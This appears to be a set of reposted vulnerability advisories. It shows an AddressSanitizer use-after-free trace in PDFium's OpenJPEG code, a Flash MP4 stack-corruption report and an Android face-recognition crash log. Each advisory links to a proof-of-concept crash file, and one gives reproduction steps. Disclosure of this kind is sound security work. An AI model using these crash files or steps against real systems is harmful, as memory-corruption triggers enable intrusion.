    #19 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
    #20 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
    #21 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
    #22 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
    #23 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
    #24 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
    #25 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
    #26 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
    #27 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
    #28 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #29 0x4f16e9 in main samples/pdfium_test.cc:608:5

0x606000001160 is located 0 bytes inside of 49-byte region [0x606000001160,0x606000001191)
freed by thread T0 here:
    #0 0x4beb80 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
    #1 0xa5bba5 in opj_j2k_read_sod third_party/libopenjpeg20/j2k.c:4359:61
    #2 0xa5784a in opj_j2k_read_tile_header third_party/libopenjpeg20/j2k.c:7932:31
    #3 0xa9cc56 in opj_j2k_decode_tiles third_party/libopenjpeg20/j2k.c:9568:23
    #4 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
    #5 0xa6b690 in opj_j2k_decode third_party/libopenjpeg20/j2k.c:9796:15
    #6 0xaba6ed in opj_jp2_decode third_party/libopenjpeg20/jp2.c:1483:8
    #7 0xa39d8d in opj_decode third_party/libopenjpeg20/openjpeg.c:412:10
    #8 0x786a19 in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
    #9 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
    #10 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
    #11 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
    #12 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
    #13 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
    #14 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
    #15 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
    #16 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
    #17 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
    #18 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
    #19 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
    #20 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
    #21 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
    #22 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
    #23 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
    #24 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
    #25 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #26 0x4f16e9 in main samples/pdfium_test.cc:608:5
    #27 0x7f3425bc7ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287

previously allocated by thread T0 here:
    #0 0x4beb80 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
    #1 0xa5bba5 in opj_j2k_read_sod third_party/libopenjpeg20/j2k.c:4359:61
    #2 0xa5784a in opj_j2k_read_tile_header third_party/libopenjpeg20/j2k.c:7932:31
    #3 0xa9cc56 in opj_j2k_decode_tiles third_party/libopenjpeg20/j2k.c:9568:23
    #4 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
    #5 0xa6b690 in opj_j2k_decode third_party/libopenjpeg20/j2k.c:9796:15
    #6 0xaba6ed in opj_jp2_decode third_party/libopenjpeg20/jp2.c:1483:8
    #7 0xa39d8d in opj_decode third_party/libopenjpeg20/openjpeg.c:412:10
    #8 0x786a19 in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
    #9 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
    #10 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
    #11 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
    #12 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
    #13 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
    #14 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
    #15 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
    #16 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
    #17 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
    #18 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
    #19 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
    #20 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
    #21 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
    #22 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
    #23 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
    #24 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
    #25 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #26 0x4f16e9 in main samples/pdfium_test.cc:608:5
    #27 0x7f3425bc7ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287

SUMMARY: AddressSanitizer: heap-use-after-free third_party/libopenjpeg20/t2.c:874:54 in opj_t2_read_packet_header
Shadow bytes around the buggy address:
  0x0c0c7fff81d0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa
  0x0c0c7fff81e0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c0c7fff81f0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
  0x0c0c7fff8200: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa
  0x0c0c7fff8210: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
=>0x0c0c7fff8220: 00 00 00 00 00 00 00 fa fa fa fa fa[fd]fd fd fd
  0x0c0c7fff8230: fd fd fd fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c7fff8240: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0c7fff8250: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0c7fff8260: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c7fff8270: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==22386==ABORTING
--- cut ---

The crash was reported at https://code.google.com/p/chromium/issues/detail?id=551470. Attached is the PDF file which triggers the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39401.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=634

The attached mp4 file causes stack corruption in Flash. To run the test, load LoadMP42.swf?file=null.mp4 from a remote server.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39426-1.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=616

The attached file causes memory corruption when iy is scanned by the face recognition library in android.media.process

F/libc    ( 4134): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x33333333333358 in tid 12161 (syncThread)
I/DEBUG   ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
I/DEBUG   ( 3021): Revision: '10'
I/DEBUG   ( 3021): ABI: 'arm64'
I/DEBUG   ( 3021): pid: 4134, tid: 12161, name: syncThread  >>> android.process.media <<<
I/DEBUG   ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x33333333333358
I/DEBUG   ( 3021):     x0   3333333333333330  x1   0000007f714b6800  x2   000000000000001f  x3   3333333333333330
I/DEBUG   ( 3021):     x4   0000007f817fedb8  x5   0000007f7c1f4ea8  x6   0000007f7c1f4ec0  x7   0000007f7c109680
I/DEBUG   ( 3021):     x8   304b333333333333  x9   3033330333000000  x10  3333333333333333  x11  0103304b33333333
I/DEBUG   ( 3021):     x12  0000040033300311  x13  0300035033333333  x14  0300303333233333  x15  0000000000001484
I/DEBUG   ( 3021):     x16  0000007f74bfe828  x17  0000007f8c086008  x18  0000007f8c13b830  x19  0000007f7c279a00
I/DEBUG   ( 3021):     x20  0000000000000000  x21  0000007f7c1036a0  x22  0000007f817ff440  x23  0000007f7c279a10
I/DEBUG   ( 3021):     x24  0000000032d231a0  x25  0000000000000065  x26  0000000032d28880  x27  0000000000000065
I/DEBUG   ( 3021):     x28  0000000000000000  x29  0000007f817fecb0  x30  0000007f740be014
I/DEBUG   ( 3021):     sp   0000007f817fecb0  pc   0000007f740cefdc  pstate 0000000080000000
I/DEBUG   ( 3021): 
I/DEBUG   ( 3021): backtrace:
I/DEBUG   ( 3021):     #00 pc 0000000000065fdc  /system/lib64/libfacerecognition.so (MdConvertLine+28)
I/DEBUG   ( 3021):     #01 pc 0000000000055010  /system/lib64/libfacerecognition.so (MCC_Process+160)

To reproduce, download the attached file and wait, or trigger media scanning by calling:

adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39425.zip